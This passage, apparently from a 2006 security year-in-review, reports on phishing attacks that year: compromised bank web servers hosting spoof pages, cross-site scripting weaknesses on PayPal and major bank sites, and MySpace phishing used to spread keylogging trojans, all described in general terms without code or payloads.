Hacked Bank Sites: Several attacks in 2006 saw phishers hack into bank web servers and use them in attacks. In March, a Chinese bank’s web server hosted phishing sites targeting U.S. banks. The phishing pages were placed in hidden directories on The China Construction Bank (CCB) Shanghai Branch. This attack was the first instance we’ve seen of one bank’s infrastructure being used to attack another institution. Several weeks later, Phishing scammers compromised a server housing the web sites of three Florida banks and redirected their customers to spoof pages. Previous scams managed to manipulate financial sites through cross-site scripting and cross-frame content injection, but didn’t gain access to the server hosting the banks’ site.
Continued XSS Vulnerabilities: The web sites of some of the world’s leading financial institutions remained vulnerable to attacks using cross-site scripting (XSS), more than two years after Netcraft first highlighted the issue. The most prominent of these was an attack on Paypal that used XSS to insert fraudulent content into a URL hosted on the genuine PayPal web site. The URL uses SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate is presented to confirm that the site does indeed belong to PayPal. Random checks of bank web sites by the Washington Post identified XSS weaknesses on the web sites of Visa, JP Morgan Chase, eBay, Bank of America and American Express.
MySpace Phishing: Attacks targeting social networks present a small percentage of all phishing scams, but became more common in the second half of 2006 as hackers used them to seed botnets through malware distributed on sites like MySpace, LiveJournal and Orkut. MySpace accounts themselves are of limited value, but can serve as a delivery mechanism for keylogging trojans, capturing home computers that may be used for shopping or online banking as well as social networking. Several leading social networks have proven vulnerable to XSS exploits, serving as a laboratory for phishers to test new technical attacks and social engineering techniques. An October attack at MySpace was hosted on a profile page with the username login_home_index_html, and used specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form. It was the first major attack using a technique known as a reverse cross site request.